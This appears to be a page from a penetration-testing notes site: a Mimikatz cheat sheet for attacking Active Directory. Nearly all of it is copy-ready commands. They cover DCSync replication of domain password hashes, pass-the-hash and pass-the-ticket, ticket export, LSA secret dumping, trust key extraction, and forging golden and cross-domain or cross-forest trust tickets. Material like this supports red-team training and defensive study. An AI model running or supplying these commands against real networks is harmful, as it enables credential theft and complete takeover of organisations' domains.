Mimikatz

DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\USER"'
​
Invoke-Mimikatz -Command '"lsadump::dcsync /all"'
​
# When DCsyncing and other actions you need to know the short hand of the domain.
# This can be found with Translate-Canonical
https://gist.github.com/HarmJ0y/4226349db644e6549605
Pass-The-Ticket
Invoke-Mimikatz -Command '"kerberos::ptt TGS_ticket_file.kirbi"'
Pass-The-Hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.local /ntlm:<ntlmhash> /run:powershell.exe"'
Extract Tickets
Invoke-Mimikatz -Command '"kerberos::list /export"'
Dump Local Creds
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Extract Trust Keys
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc 
Forge Golden Ticket
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
Forge Inter-Domain Trust Ticket
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-15-21-280534878-1496970234-700767426-519 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"' 
Forge Inter-Forest Trust Ticket
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:HASH /service:krbtgt /target:TARGETFOREST.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'

Active Directory - Previous

Persistance

Next - Active Directory

Alternate Cred Dumps

Last modified 2yr ago

Copy link

On this page

DCSync

Pass-The-Ticket

Pass-The-Hash

Extract Tickets

Dump Local Creds

Extract Trust Keys

Forge Golden Ticket

Forge Inter-Domain Trust Ticket

Forge Inter-Forest Trust Ticket